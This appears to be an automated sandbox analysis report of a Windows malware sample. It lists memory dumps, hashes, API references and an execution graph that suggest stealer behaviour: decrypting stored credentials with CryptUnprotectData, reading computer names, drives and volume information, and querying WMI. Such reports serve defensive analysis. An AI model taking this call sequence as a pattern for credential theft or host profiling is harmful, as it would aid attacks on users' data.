                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 158306478-0
                                                                                                                  • Opcode ID: 54c35c0a5dcb941cf8583139c07fcebf67147abd9effc8346e8212600717bf9d
                                                                                                                  • Instruction ID: a062ab5a912473d4fac1d0ceaf684ad244b34322521b02687160583ff79f9581
                                                                                                                  • Opcode Fuzzy Hash: 54c35c0a5dcb941cf8583139c07fcebf67147abd9effc8346e8212600717bf9d
                                                                                                                  • Instruction Fuzzy Hash: 8311C0F5A15215FE6F6177B6AC89CBF6FACCF843A83150128F841D1201FA20DF0192B1
                                                                                                                  APIs
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00D816BD
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D816CB
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00D816E4
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00D81723
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2261580123-0
                                                                                                                  • Opcode ID: eb2ef3b8ca8e52b18280172f1509ed4a87d2761644fc47492b45bfa58296f223
                                                                                                                  • Instruction ID: acabde55f8244096f8cb4f37f7a538f2973f3381ccc1db1300655912b092cdb3
                                                                                                                  • Opcode Fuzzy Hash: eb2ef3b8ca8e52b18280172f1509ed4a87d2761644fc47492b45bfa58296f223
                                                                                                                  • Instruction Fuzzy Hash: EE21D3B4E04209CFDB08EFA8D5926AEFBF5EF48300F05845DE889A7351DB399941CB61
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3.LIBCMT ref: 00D8AA68
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D8AA72
                                                                                                                    • Part of subcall function 00D84080: std::_Lockit::_Lockit.LIBCPMT ref: 00D840AE
                                                                                                                    • Part of subcall function 00D84080: std::_Lockit::~_Lockit.LIBCPMT ref: 00D840D9
                                                                                                                  • codecvt.LIBCPMT ref: 00D8AAAC
                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8AAE3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3716348337-0
                                                                                                                  • Opcode ID: 21ffaabe07afb4926a25e34ba41d4919728605c1086803f18af94245b3fbb3e7
                                                                                                                  • Instruction ID: dca86890ad292cee8853a663e44467a35fda09e86b1319434b1a72bb4c1c1822
                                                                                                                  • Opcode Fuzzy Hash: 21ffaabe07afb4926a25e34ba41d4919728605c1086803f18af94245b3fbb3e7
                                                                                                                  • Instruction Fuzzy Hash: 1B01C0B1900216DBCB09FB68D9596BEB7B5EF80320F29410AE811A7391DF749E00CBB1
                                                                                                                  APIs
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000), ref: 00DA6077
                                                                                                                  • GetLastError.KERNEL32(?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?,?,?,00D9F041,00000000), ref: 00DA6083
                                                                                                                    • Part of subcall function 00DA60D4: CloseHandle.KERNEL32(FFFFFFFE,00DA6093,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?,?), ref: 00DA60E4
                                                                                                                  • ___initconout.LIBCMT ref: 00DA6093
                                                                                                                    • Part of subcall function 00DA60B5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DA6051,00DA553C,?,?,00D9F6FB,?,00000000,00000000,?), ref: 00DA60C8
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?), ref: 00DA60A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2744216297-0
                                                                                                                  • Opcode ID: ff87bc1180fd93343d2c024f373391b42f2dbd77685d9fb7efde3242f948296e
                                                                                                                  • Instruction ID: d1482df3acc6bb2ec2d125b974bf6961d6c52d8d355d204a39f084ecc8380053
                                                                                                                  • Opcode Fuzzy Hash: ff87bc1180fd93343d2c024f373391b42f2dbd77685d9fb7efde3242f948296e
                                                                                                                  • Instruction Fuzzy Hash: E0F03736401224FBCF222F91DC0999A3F65FB453A0F088110FA19D5270CB31C960ABB5
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcspn
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3709121408-2766056989
                                                                                                                  • Opcode ID: a546db021739ce0d8ebc9515ffc76dc2eb24b43d1314184c01583daac12d15b8
                                                                                                                  • Instruction ID: f18b8f625ecda85b3788d69dc424d342c52059ea92747f7d63b77b58885694d4
                                                                                                                  • Opcode Fuzzy Hash: a546db021739ce0d8ebc9515ffc76dc2eb24b43d1314184c01583daac12d15b8
                                                                                                                  • Instruction Fuzzy Hash: 7432C5B4904269CFCB14EF64C981AADFBF1BF48310F15859AE849A7351D730AE85CFA1
                                                                                                                  APIs
                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D96CFF,?,?,00000000,00000000,00000000,?), ref: 00D96E23
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EncodePointer
                                                                                                                  • String ID: MOC$RCC
                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                  • Opcode ID: 28e40cc98cb5eed2f3d0332c11aef93917444f20cee66628853a153108bc5af1
                                                                                                                  • Instruction ID: 732b35ea4839a1986fab29ed6cbd1ca2de4d4a310616efba67207408725eddbe
                                                                                                                  • Opcode Fuzzy Hash: 28e40cc98cb5eed2f3d0332c11aef93917444f20cee66628853a153108bc5af1
                                                                                                                  • Instruction Fuzzy Hash: 5D412672900209EFCF16DF98D981AAEBBB5FF48304F198199FA04A7221D335E950DB70
                                                                                                                  APIs
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D968E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ___except_validate_context_record
                                                                                                                  • String ID: csm$csm
                                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                                  • Opcode ID: aaf8f6f65dfbfe904336524272207b742f04c9cfde56eb61897fb40169e59a3c
                                                                                                                  • Instruction ID: e6d5fdfc286cd8ef581cfc420e46366b103a9c4accd5b8f2eff10e453ec4eb2c
                                                                                                                  • Opcode Fuzzy Hash: aaf8f6f65dfbfe904336524272207b742f04c9cfde56eb61897fb40169e59a3c
                                                                                                                  • Instruction Fuzzy Hash: 3531C432400219FBCF269F54CD44A6A7B66FF09315B1C826AF9944A121D332DCA1DFB1

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:5%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:35.5%
                                                                                                                  Total number of Nodes:234
                                                                                                                  Total number of Limit Nodes:17
                                                                                                                  execution_graph 30093 433b43 30096 433b6e 30093->30096 30094 433bc1 30096->30094 30097 439df0 LdrInitializeThunk 30096->30097 30097->30096 30098 418a48 30099 418a56 30098->30099 30100 4188ff 30098->30100 30100->30098 30101 418cd2 CryptUnprotectData 30100->30101 30101->30099 30101->30100 30102 40d04a 30103 40d070 30102->30103 30104 40d0ce 30103->30104 30106 439df0 LdrInitializeThunk 30103->30106 30106->30104 30107 41ffd0 30108 41ffde 30107->30108 30112 420030 30107->30112 30113 4200f0 30108->30113 30110 4200ac 30111 41e5e0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 30110->30111 30110->30112 30111->30112 30114 420100 30113->30114 30114->30114 30117 43c070 30114->30117 30116 4201df 30118 43c090 30117->30118 30119 43c1ae 30118->30119 30121 439df0 LdrInitializeThunk 30118->30121 30119->30116 30121->30119 30203 422693 30204 422697 30203->30204 30205 43c070 LdrInitializeThunk 30204->30205 30206 422781 30205->30206 30207 43c070 LdrInitializeThunk 30206->30207 30207->30206 30127 42b0e3 30128 42b101 30127->30128 30129 42b1db FreeLibrary 30128->30129 30130 42b624 30129->30130 30131 42b634 GetComputerNameExA 30130->30131 30132 42b670 GetComputerNameExA 30131->30132 30134 42b750 30132->30134 30135 433961 30139 43b800 30135->30139 30138 4339a4 30140 433979 GetUserDefaultUILanguage 30139->30140 30140->30138 30208 42d6a0 CoSetProxyBlanket 30209 42b621 30210 42b624 30209->30210 30211 42b634 GetComputerNameExA 30210->30211 30212 42b670 GetComputerNameExA 30211->30212 30214 42b750 30212->30214 30215 40d423 30216 40d440 30215->30216 30218 40d49e 30216->30218 30267 439df0 LdrInitializeThunk 30216->30267 30220 40d53e 30218->30220 30268 439df0 LdrInitializeThunk 30218->30268 30231 423140 30220->30231 30222 40d5ba 30235 424f90 30222->30235 30228 40d5ec 30269 4303d0 6 API calls 30228->30269 30230 40d63e 30232 42314e 30231->30232 30270 43c520 30232->30270 30236 4251a9 30235->30236 30237 40d5da 30235->30237 30238 42518a 30235->30238 30242 424fb6 30235->30242 30243 42521f 30235->30243 30249 425240 30235->30249 30236->30237 30236->30243 30236->30249 30250 4252b2 30236->30250 30275 439d90 30236->30275 30253 4256e0 30237->30253 30304 43c840 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30238->30304 30241 43c520 LdrInitializeThunk 30241->30243 30242->30236 30242->30237 30242->30238 30242->30242 30242->30243 30245 43c520 LdrInitializeThunk 30242->30245 30242->30249 30242->30250 30243->30237 30243->30241 30247 4254d0 30243->30247 30243->30249 30243->30250 30284 43c610 30243->30284 30294 43ce10 30243->30294 30245->30242 30305 439df0 LdrInitializeThunk 30247->30305 30249->30250 30306 439df0 LdrInitializeThunk 30249->30306 30307 439df0 LdrInitializeThunk 30250->30307 30254 425700 30253->30254 30256 42573e 30254->30256 30321 439df0 LdrInitializeThunk 30254->30321 30255 40d5e3 30263 4259f0 30255->30263 30256->30255 30258 438550 RtlAllocateHeap 30256->30258 30260 4257bd 30258->30260 30259 438570 RtlFreeHeap 30259->30255 30262 42580e 30260->30262 30322 439df0 LdrInitializeThunk 30260->30322 30262->30259 30264 4259f9 30263->30264 30264->30228 30323 436870 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30264->30323 30266 426269 30267->30218 30268->30220 30269->30230 30272 43c540 30270->30272 30271 423236 30271->30222 30272->30271 30274 439df0 LdrInitializeThunk 30272->30274 30274->30271 30276 439db6 30275->30276 30277 439dd5 30275->30277 30278 439dca 30275->30278 30279 439da8 30275->30279 30283 439dbb RtlReAllocateHeap 30276->30283 30311 438570 30277->30311 30308 438550 30278->30308 30279->30276 30279->30277 30282 439dd0 30282->30243 30283->30282 30285 43c630 30284->30285 30289 43c66e 30285->30289 30317 439df0 LdrInitializeThunk 30285->30317 30286 43c82c 30286->30243 30288 438550 RtlAllocateHeap 30291 43c6da 30288->30291 30289->30286 30289->30288 30290 438570 RtlFreeHeap 30290->30286 30293 43c73f 30291->30293 30318 439df0 LdrInitializeThunk 30291->30318 30293->30290 30293->30293 30295 43ce21 30294->30295 30297 43cf4f 30295->30297 30319 439df0 LdrInitializeThunk 30295->30319 30296 43d117 30296->30243 30297->30296 30298 438550 RtlAllocateHeap 30297->30298 30300 43cfb6 30298->30300 30302 43d05e 30300->30302 30320 439df0 LdrInitializeThunk 30300->30320 30301 438570 RtlFreeHeap 30301->30296 30302->30301 30304->30236 30305->30249 30306->30250 30307->30250 30315 43b4a0 30308->30315 30312 438583 30311->30312 30313 4385a0 30311->30313 30314 438588 RtlFreeHeap 30312->30314 30313->30282 30314->30313 30316 43855a RtlAllocateHeap 30315->30316 30316->30282 30317->30289 30318->30293 30319->30297 30320->30302 30321->30256 30322->30262 30323->30266 30324 42c024 30326 42a240 30324->30326 30325 42c0fd 30326->30324 30326->30325 30326->30326 30328 439df0 LdrInitializeThunk 30326->30328 30328->30326 30329 43aa29 30330 43aa40 30329->30330 30330->30330 30333 43aa8e 30330->30333 30336 439df0 LdrInitializeThunk 30330->30336 30331 43ab2e 30333->30331 30335 439df0 LdrInitializeThunk 30333->30335 30335->30331 30336->30333 30337 4228a8 30338 4228b2 30337->30338 30341 422a5d 30337->30341 30338->30338 30339 422a47 GetLogicalDrives 30338->30339 30340 43c070 LdrInitializeThunk 30339->30340 30340->30341 30341->30341 30342 43a92f GetForegroundWindow GetForegroundWindow 30142 408870 30144 40887f 30142->30144 30143 4089d2 ExitProcess 30144->30143 30145 408894 GetCurrentProcessId GetCurrentThreadId 30144->30145 30146 4089cd 30144->30146 30148 4088b9 30145->30148 30149 4088bd SHGetSpecialFolderPathW GetForegroundWindow 30145->30149 30160 439d70 FreeLibrary 30146->30160 30148->30149 30150 408912 30149->30150 30156 409a30 30150->30156 30152 4089bc 30152->30146 30153 40c900 CoInitializeEx 30152->30153 30154 4089c8 30153->30154 30155 40b400 FreeLibrary FreeLibrary 30154->30155 30155->30146 30157 409a60 30156->30157 30157->30157 30158 409ae7 LoadLibraryExW 30157->30158 30159 409afc 30158->30159 30160->30143 30343 435530 30344 435555 30343->30344 30346 435600 30344->30346 30352 439df0 LdrInitializeThunk 30344->30352 30348 435815 30346->30348 30350 4356fa 30346->30350 30351 439df0 LdrInitializeThunk 30346->30351 30350->30348 30353 439df0 LdrInitializeThunk 30350->30353 30351->30346 30352->30344 30353->30350 30354 4385b0 30355 4385d0 30354->30355 30357 43861e 30355->30357 30364 439df0 LdrInitializeThunk 30355->30364 30356 4387fd 30357->30356 30359 438550 RtlAllocateHeap 30357->30359 30361 438699 30359->30361 30360 438570 RtlFreeHeap 30360->30356 30363 4386ff 30361->30363 30365 439df0 LdrInitializeThunk 30361->30365 30363->30360 30364->30357 30365->30363 30366 43c2b0 30368 43c2d0 30366->30368 30367 43c39e 30370 43c30e 30368->30370 30372 439df0 LdrInitializeThunk 30368->30372 30370->30367 30373 439df0 LdrInitializeThunk 30370->30373 30372->30370 30373->30367 30374 4167b7 30375 4167bc 30374->30375 30387 438960 30375->30387 30377 4167d4 30378 416b7c 30377->30378 30379 416af7 30377->30379 30380 416894 30377->30380 30384 416947 30377->30384 30385 416958 30377->30385 30393 41ba00 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 30378->30393 30392 41ba00 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 30379->30392 30391 41ba00 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 30380->30391 30385->30378 30385->30379 30385->30384 30386 43c070 LdrInitializeThunk 30385->30386 30386->30385 30388 4389ce 30387->30388 30389 43896a 30387->30389 30388->30377 30389->30388 30394 439df0 LdrInitializeThunk 30389->30394 30394->30388 30161 43a974 30162 43a990 30161->30162 30165 439df0 LdrInitializeThunk 30162->30165 30164 43aa0f 30165->30164 30395 43a834 30397 43a860 30395->30397 30396 43a8b8 30397->30396 30399 439df0 LdrInitializeThunk 30397->30399 30399->30396 30166 40c97b 30167 40c990 30166->30167 30170 435880 30167->30170 30169 40c9d3 30171 4358b0 CoCreateInstance 30170->30171 30173 435b67 SysAllocString 30171->30173 30174 435eed 30171->30174 30177 435be4 30173->30177 30176 435efd GetVolumeInformationW 30174->30176 30185 435f17 30176->30185 30178 435edd SysFreeString 30177->30178 30179 435bec CoSetProxyBlanket 30177->30179 30178->30174 30180 435ed3 30179->30180 30181 435c0c SysAllocString 30179->30181 30180->30178 30183 435cd0 30181->30183 30183->30183 30184 435cf0 SysAllocString 30183->30184 30188 435d17 30184->30188 30185->30169 30186 435ebd SysFreeString SysFreeString 30186->30180 30187 435eb3 30187->30186 30188->30186 30188->30187 30189 435d5b VariantInit 30188->30189 30191 435db0 30189->30191 30190 435e9e VariantClear 30190->30187 30191->30190 30192 43a578 30194 43a4bd 30192->30194 30193 43a5c4 30194->30193 30194->30194 30197 439df0 LdrInitializeThunk 30194->30197 30196 43a5e5 30197->30196 30400 40c93e CoInitializeSecurity

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 6 435880-4358aa 7 4358b0-4358f7 6->7 7->7 8 4358f9-43590f 7->8 9 435910-435968 8->9 9->9 10 43596a-4359a7 9->10 11 4359b0-4359cc 10->11 11->11 12 4359ce-4359ea 11->12 14 4359f0-4359fb 12->14 15 435aca-435ad3 12->15 16 435a00-435a4e 14->16 17 435ae0-435b08 15->17 16->16 18 435a50-435a63 16->18 17->17 19 435b0a-435b61 CoCreateInstance 17->19 22 435a70-435ab6 18->22 20 435b67-435b98 19->20 21 435eed-435f15 call 43b800 GetVolumeInformationW 19->21 23 435ba0-435bbe 20->23 28 435f17-435f1b 21->28 29 435f1f-435f21 21->29 22->22 25 435ab8-435ac6 22->25 23->23 26 435bc0-435be6 SysAllocString 23->26 25->15 32 435edd-435ee9 SysFreeString 26->32 33 435bec-435c06 CoSetProxyBlanket 26->33 28->29 31 435f3d-435f44 29->31 34 435f50-435f69 31->34 35 435f46-435f4d 31->35 32->21 37 435ed3-435ed9 33->37 38 435c0c-435c1f 33->38 36 435f70-435fb5 34->36 35->34 36->36 39 435fb7-435ff1 36->39 37->32 40 435c20-435c4a 38->40 41 436000-43602d 39->41 40->40 42 435c4c-435cc6 SysAllocString 40->42 41->41 43 43602f-436063 call 41d370 41->43 44 435cd0-435cee 42->44 48 436070-436078 43->48 44->44 46 435cf0-435d19 SysAllocString 44->46 51 435d1f-435d41 46->51 52 435ebd-435ecf SysFreeString * 2 46->52 48->48 50 43607a-43607c 48->50 53 436082-436092 call 4080c0 50->53 54 435f30-435f37 50->54 58 435eb3-435eb9 51->58 59 435d47-435d4a 51->59 52->37 53->54 54->31 56 436097-43609e 54->56 58->52 59->58 61 435d50-435d55 59->61 61->58 62 435d5b-435da7 VariantInit 61->62 63 435db0-435dce 62->63 63->63 64 435dd0-435dde 63->64 65 435de2-435de4 64->65 66 435dea-435df0 65->66 67 435e9e-435eaf VariantClear 65->67 66->67 68 435df6-435e04 66->68 67->58 69 435e06-435e0b 68->69 70 435e3d 68->70 72 435e1c-435e20 69->72 71 435e3f-435e65 call 408030 call 408cf0 70->71 83 435e67 71->83 84 435e6c-435e74 71->84 74 435e22-435e2b 72->74 75 435e10 72->75 78 435e32-435e36 74->78 79 435e2d-435e30 74->79 77 435e11-435e1a 75->77 77->71 77->72 78->77 80 435e38-435e3b 78->80 79->77 80->77 83->84 85 435e76 84->85 86 435e7b-435e9a call 408060 call 408040 84->86 85->86 86->67
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 00435B59
                                                                                                                  • SysAllocString.OLEAUT32(C173DF3B), ref: 00435BC1
                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435BFE
                                                                                                                  • SysAllocString.OLEAUT32(C826F622), ref: 00435C51
                                                                                                                  • SysAllocString.OLEAUT32(A466A272), ref: 00435CF5
                                                                                                                  • VariantInit.OLEAUT32(CECDCCF3), ref: 00435D60
                                                                                                                  • VariantClear.OLEAUT32(CECDCCF3), ref: 00435EA3
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00435EC7
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00435ECD
                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00435EDE
                                                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,C173DF3B,00000000,00000000,00000000,00000000), ref: 00435F0E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                  • String ID: ,-./$EP$QR$@dy
                                                                                                                  • API String ID: 2573436264-442951764
                                                                                                                  • Opcode ID: 70ec9ae03888c60de39039395fe5beec92ddb2858c77087bc173a14fb67959b0
                                                                                                                  • Instruction ID: 29926613f5cf6e48166075966a574d9e19e78f2bdd3ed2d624ba22a0fdd574ce
                                                                                                                  • Opcode Fuzzy Hash: 70ec9ae03888c60de39039395fe5beec92ddb2858c77087bc173a14fb67959b0
                                                                                                                  • Instruction Fuzzy Hash: 5722FE726183409FD710CF28C881B9BBBE6EBC9704F14892DF591DB2A1D778D9098B96

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
